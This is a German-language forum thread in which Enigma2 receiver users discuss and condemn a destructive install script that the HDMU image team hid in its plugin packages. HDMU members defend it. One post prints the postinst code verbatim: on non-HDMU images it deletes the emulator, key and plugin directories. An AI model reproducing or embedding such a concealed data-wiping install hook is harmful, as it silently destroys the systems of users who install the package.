Handgranatenproblematik bei HDMU-ipk's

Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

  • Finden kannst Du einiges bei HDMU unter
    ipkserver.hdmedia-universe.com/sh4new/

    Grundsätzlich:
    Pakete (.ipk) manuell istallieren
    ---------------------------------
    opkg install <pluginname>
    ipkg install <pluginname>
    wobei <pluginname> auch die Internetadresse / der Internetpfad sein kann
    z.B. ipkg install h ttp://ipkserver.hdmedia-universe.com/sh4new/enigma2-plugin-webapps-icefilms_1.0_sh4.ipk

    Sollte die Installation abbrechen mit dem Hinweis, das irgendwelche Dateien überschrieben werden sollen, die schon von anderen Paketen benutz werden hilft ggf. ein
    "ipkg install -force-overwrite <pluginname>"

    Speziell:
    kenn ich dieses Image nicht, so dass ich nichts dazu sagen kann, ob opkg oder ipkg und ob die Pakete hier auch wirklich laufen

    NACHTRAG:
    Wenn die IPK's von HDMU tatsächlich gegen "klau" (siehe nächster Beitrag), wobei die in der Regel eh auch nur "organisiert" sind, gesichert sind, dann kann man die immer noch mit 7z entpacken und manuell installieren/kopieren (wenn man weiß wie,wo,was) oder einfach mit Google nach "freundlichen" Versionen suchen, aber immer an "sh4" beim Suchen denken, damit auch die richtige Plattform gewährleistet ist / unterstützt wird...

    PS: mit der 7-ZipPortable_4.65_Rev_2 findet man auch alle Dateien, die in dem IPK hinterlegt sind und somit auch die "control.tar.gz" und dort dann die "postinst", die den giftigen Quellcode beinhaltet!!!
    Den Bastlern unter Euch ist es dann ggf. möglich, sich ein neues IPK zu erstellen:
    dream.reichholf.net/wiki/Howto:IPK_Pakete_erstellen
    oder Spiegel myazbox.de/wiki//index.php/IPK_Pakete_erstellen
    Dateien
    .
    Bedanken stellt entgegen weitläufiger Meinung keinen Tatbestand nach § 223 StGB dar
    W-LAN (WiFi)
    .

    Dieser Beitrag wurde bereits 3 mal editiert, zuletzt von no_spam_for_me ()

  • Apropos: müsst ihr eure ipk-Pakete gegen Klau wirklich mit solch rigiden Mitteln absichern?

    die meisten User erfahren erst nach dem Zerschiessen des Fremd-Systems, dass die HDMU-ipk eine Handgranate eingebaut haben.

    Im Dateinamen erkennt man ja leider auch nicht woher das ipk einmal kam, das wird sich so mancher schon gewundert haben... ;)
    Alle Fragen bitte im Forum stellen!
    Anfragen via PN oder Mail werden gelöscht.

    >>> Liste aller mit openhdf-Image supporteten Boxenmodelle <<<

  • Quellcode

    1. if [ `cat /etc/motd | grep HDMU | wc -l` -eq 0 ]; then
    2. rm -rf /usr/emu/
    3. rm -rf /usr/keys/
    4. rm -rf /usr/lib/enigma2/python/Plugins/Extensions/*
    5. echo "Do not use other feedserver!!!"
    6. fi



    dieser code ist mit drin und wird bei Installation auf einem Nicht-HDMU-Image ausgeführt.
    dadurch wird wild gelöscht und das Image ist faktisch unbrauchbar.
    Alle Fragen bitte im Forum stellen!
    Anfragen via PN oder Mail werden gelöscht.

    >>> Liste aller mit openhdf-Image supporteten Boxenmodelle <<<

  • wo in der ipk steht das?
    habe mir mal die enigma2-plugin-webapps-icefilms_1.0_sh4.ipk mit 7z angesehen und kann das nicnt finden...

    PS: mit der 7-ZipPortable_4.65_Rev_2 findet man auch alle Dateien, die in dem IPK hinterlegt sind und somit auch die "control.tar.gz" und dort dann die "postinst", die den giftigen Quellcode beinhaltet!!!
    Den Bastlern unter Euch ist es dann ggf. möglich, sich ein neues IPK zu erstellen:
    dream.reichholf.net/wiki/Howto:IPK_Pakete_erstellen
    oder Spiegel myazbox.de/wiki//index.php/IPK_Pakete_erstellen
    .
    Bedanken stellt entgegen weitläufiger Meinung keinen Tatbestand nach § 223 StGB dar
    W-LAN (WiFi)
    .

    Dieser Beitrag wurde bereits 2 mal editiert, zuletzt von no_spam_for_me ()

  • Handgranatenproblematik bei HDMU

    Das was Googgi da entdeckt hat ist echt starker Tobak :rocket: Sowas macht man einfach nicht. Darüberhinaus hat HDMU sicher noch nicht einmal einen Teil (wenn überhaupt) der Plugins selbst entwickelt oder angepasst. Es hätte doch sicher ausgereicht die Installation auf fremden Images einfach zu verhindern oder irgendeinen Warnhinweis (z.B. nach Start des Plugins) zu geben. Möglichkeiten gibts zu Hauf. Und sicherlich zählt das Zerschiessen eines Nicht HDMU Imgages nicht dazu.

    Was da aber gemacht wird ist echt fies und hinterhältig. Das lässt mich doch sehr an der moralischen Integrität von HDMU zweifeln. Das Problem ist ja nun nicht wie man diese Handgranate in anderen Images am Zünden hindert, sondern das HDMU sowas überhaupt eingebaut hat. Was erwartet uns denn zukünftig? Löschen der angeschlossenen Festplatte oder Nas? Injizieren von sonstigem Schadcode im Image?
    Mir stellt sich dann auch die Frage, wie weit geht denn dann die Selbstjustiz, wenn dann HDMU wieder etwas gegen den Strich geht und sie den "Übeltäter" bestrafen will, weil er irgendwie "fremdgeht"? Was ist noch unter der "Motorhaube" von HDMU -Plugins und Images verborgen, was bis jetzt noch gar nicht entdeckt wurde?
    Was passiert denn wenn man ein Plugin eines, ich sag mal , nicht "befreundeten" Programierers in HDMU einbindet? Löst sich dann die Box und der angeschlossene Fernseher /Receiver in Rauch auf?
    Zugegeben das letztere ist vielleicht etwas weit hergeholt. Trotzdem: Ich finde bei sowas hört der Spass jetzt echt auf ! :minigun:

    Von sowas sollten sich die Massgeblichen bei HDMU schnell distanzieren!

    Ich wollte bis jetzt bei HDMU bleiben, weil es einfach aus meiner Sicht im Moment das beste Image ist,. Aber solch ein Verhgalten ist echt ein NOGO. Dann lieber ein weniger gutes Image von einem "Verein" ohne solche Verhaltensweisen.

    Dieser Beitrag wurde bereits 2 mal editiert, zuletzt von FredMax ()

  • interessant hier zu lesen....mir persönlich ist es scheiss egal ob ihr hdmu nutzt oder nicht

    die zeit zum basteln geht in unserer freizeit drauf....das kriegen wir nicht bezahlt......


    und wieder einmal macht sich niemand gedanken um traffic oder sonstiges....
    wie wir die ipks schützen ist unser bier, wir hätten auch nen flasheraseall reinkloppen können


    so hat man wenigstens einen lerneffekt......aber nein das is ja zu grob, ....ganz ehrlich, user die kaum ahnung davon haben, werden nichtmal ausprobieren einen feed von einem fremdimage in ein anderes auszuprobieren, weil sie nichtmal wissen wo diese adresse drin steht........

    und den ipk server zu pflegen und die plugins ans image anzupassen kostet wohl keine zeit was? ich versteh nich wie ihr alle immer denkt......

    immer nur haben haben haben....wir wissen selbst das wir wohl mit der besten pluginserver haben, das lassen wir uns doch nicht einfach so klauen, es gibt methoden wie man die ipks trotzdem installiert bekommt, eben nur nicht direkt vom feed



    das waren meine einzigen sätze die ich jetzt dazu schreibe, auf weiteres antworte ich nicht !
  • Man sieht jetzt sehr deutlich, dass das nicht irgendein "Versehen" war., sondern ,das das sehr bewusst gemacht wurde. Wenigstens ehrlich ist er., Aber trotzdem aus meiner Sicht absolut nicht entschuldbar.
    "...wie wir die ipks schützen ist unser bier, wir hätten auch nen flasheraseall reinkloppen können" Der Zweck heiligt noch lange nicht alle Mittel !

    Solch ein Recht für sich und HDMU zu beanspruchen ist mehr als dreist und anmassend. Sollen jetzt die Leute noch dankbar sein, dass nicht noch mehr kaputtgemacht wird ????

    Es geht ja auch darum, Googgi hat es ja schon gesagt, dasss Leute sich solch ein Plugin von einem ganz anderen Server runterladen und dann die Granate explodiert, weil man es der IPK Datei von aussen nun mal nicht ansieht. Es sind also nicht nur die" sowas von bösen Jungs betroffen" :ironie: , die "sich sowas von erdreisten" :ironie: den Plugin Download link in das Fremd image einzubinden und die einfach so ghart wie möglich bestraft werden müssen. Am besten direkt die Mausklickhand abhacken :rocket:

    Warum wurde nicht nur eine Abfrage programmiert, dass nur "offizielle" HDMU Images "eure" Plugins runterladen können. Eine Autentifizierung am Server und in den Images zu programieren dürfte für euch doch wirklich keine Schwierigkeit darstellen. Aber der Effekt, das ein Fremdimage einfach auf den IPK Server nicht zugreifen kann ist wohl nicht eindrucksvoll genug. Es muss ja ein nachhaltiger Erziehungseffekt erzielt werden. :rocket: Wie wär es denn das Gerät dirket zum Garantiefall zu zu zerschiessen?? (Möglich wär ja sowas) Gute Idee oder? Wäre doch sowas von erzieherisch.

    Jeder der Kritik äussert ist undankbar und müsste euch eigentlich die Füsse küssen und die Klappe halten, weill ihr euere Freizeit altrusistisch für undankbare Nassauer "verschwendet"?

    Wenn ihr diese Meinung habt und euch solcher Methoden weiterhin und zuukübftig bedient, dann gehört, wenigstens für mich, HDMU der Vergangenheit an.
    Auch wenn es euch dann überhaupt nicht juckt.
    Aber vielleicht solltet ihr wirklich Bucks für euere Leistung verlangen. Denn ein paar Euro würde sicher jeder für gute Arbeit löhnen. Und dann würdet ihr vieleicht dem "Kunden" auch ein paar Rechte zubilligen . Und nicht nur das Recht die Schnauze zu halten.

    P.S. Ich war bisher überhaupt nicht von der Angelegenheit betroffen, da ich nicht IPKs von HDMU in Fremdimages versucht habe einzubinden. Bei mir ist also keine Granante hochgegangen., Ich hab das hier nur gelesen. Aber die Verhaltensweisen., bekräftigt durch das letzte Statement von Bonkel sind sowas von daneben. Da kocht bei mir die Galle :sorry. e.
    Schadcode in Software einzubauen gehört in den Bereich der (organisierten) Kriminalität und da sollte er auch bleiben. Auch wenn die Auswirkungen bis jetzt noch verhältnismäßig gering sind. Aber aus der Perspektive von HDMU schein ja auch noch mehr vertretbar zu erscheinen..... (siehe Statement von Bonkel)

    Dann macht menetwegen eueren Laden closed und schiebt euch gegenseitig die Granaten unter.
    Viel Spass dabei.

    Dieser Beitrag wurde bereits 3 mal editiert, zuletzt von FredMax ()

  • FredMax schrieb:

    Dann macht menetwegen eueren Laden closed und schiebt euch gegenseitig die Granaten unter.
    Viel Spass dabei.
    Machen wir gerne wenn du uns alternaiven bietest die wir nutzen können.
    Ich würde mich über mehr Freizeit freuen.

    Dieses Thema wurde schonmal diskutiert, es gibt keine sichere Möglichkeit. Geschweige denn das wir
    nochmehr lust und Zeit haben uns mit den Problemen von Usern zu kümmern die nichtmal unser image
    nutzen.

    Mal ganz im Ernst, wie lange dauert es ein Image zu installieren, das werden die meisten leute schneller
    schaffen als unseren feed bei sich einzupflegen.

    Ich persönlich finde die Art und Weise übrigens witzig und ne schöne Lösung.

    Ne simple Sperre würde die Leute dazu bringen das noch tausendmal zu testen bis es denn geht, so vergeht
    doch schneller die Lust.

    Wie gesagt, mach einfach nen eigenen Feed Server auf, halte den frisch und wir nutzen den dann und unsere
    User sind froh was sie für nen tolles Image mit viele plugins haben und wir haben nix zu tun.
    Das ist schön.
  • Danke für die aussagekräftige Antwort :) :danke: Man siehst, das die Meinung der Zweck heiligt die Mittel nicht nur von Bonkel stellvertretend für HDMU geäußert wird sondern auch von anderen nicht unwichtigen Mitgliedern bei HDMU mitgetragen wird.

    Jeder weiss jetzt Bescheid und jeder kann selbst entscheiden, ob er sich solchen "Geschäftsbedingungen" ausliefert.

    Viel Spass und viel Glück

    Bomben zu finden und zu entschärfen soll ja auch Spass machen. Als nächstes wäre es vieleicht auch sinnvoll eine Virenschutzsoftware auf die Box aufzuspielen. :cursing:

    Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von FredMax ()

  • Also ich finde diese Methode auch schon sehr fies und hinterhältig und hoffe dass Ihr nicht auf die Idee kommt, noch einen nachzulegen.

    Charakterlich einwandfreier hätte ich die Lösung gefunden, explizit das Installierte PlugIn wieder rauszuschmeißen, gerne mit dem DEUTLICHEN Hinweis, dass das NUR für HDMU gedacht ist.
    Dies sollte ja kein Problem sein, wenn Ihr alle PlugIns, die Ihr zwar häufig genug auch nur organisiert, Eurer Aussage nach mit viel Aufwand sowieso anfasst.
    .
    Bedanken stellt entgegen weitläufiger Meinung keinen Tatbestand nach § 223 StGB dar
    W-LAN (WiFi)
    .
  • santa schrieb:

    Ich persönlich finde die Art und Weise übrigens witzig und ne schöne Lösung.


    So gehen halt die Meinungen auseinander.

    Ich find die Schadenfreude halt sehr bedenklich.

    Das HDMU ignoriert ja völlig dass viele ipks auf Reisen gehen in irgendwelche ULCs oder Freehoster.
    Von dort nichtsanhnend gesaugt explodiert dann die Granate irgendwann auf Images völlig Unschuldiger ;(
    Alle Fragen bitte im Forum stellen!
    Anfragen via PN oder Mail werden gelöscht.

    >>> Liste aller mit openhdf-Image supporteten Boxenmodelle <<<

  • Ich finde einfach man darf alles nicht so ernst nehmen, keiner bezahlt für etwas und nichts geht wirklich kaputt.
    Und wenn Uploader alles ungetestet hochladen und jeder depp das sich einfach installiert.
    Respekt für den Mut.

    Sicherlich ist dann unseres die freundlichste davon.

    Wie schon woanders geschrieben, da könnte alles drin sein(auch Trojaner), ein bißchen Menschenverstand beim laden
    von irgendwelchen zeug sollte man einfach haben, dann passiert einem auch nix.
    Also plugins eben nur beim ersteller oder einem Board/Image was man vertrauen kann.

    Wenn man unser Image nutzt und dann einem was passiert, dann sind wir auch sicher schuldbewusst, aber auch dann
    muss sich jeder bewusst sein das es experimentelle Software ist.

Unsere Partnerboards

^
Flag Counter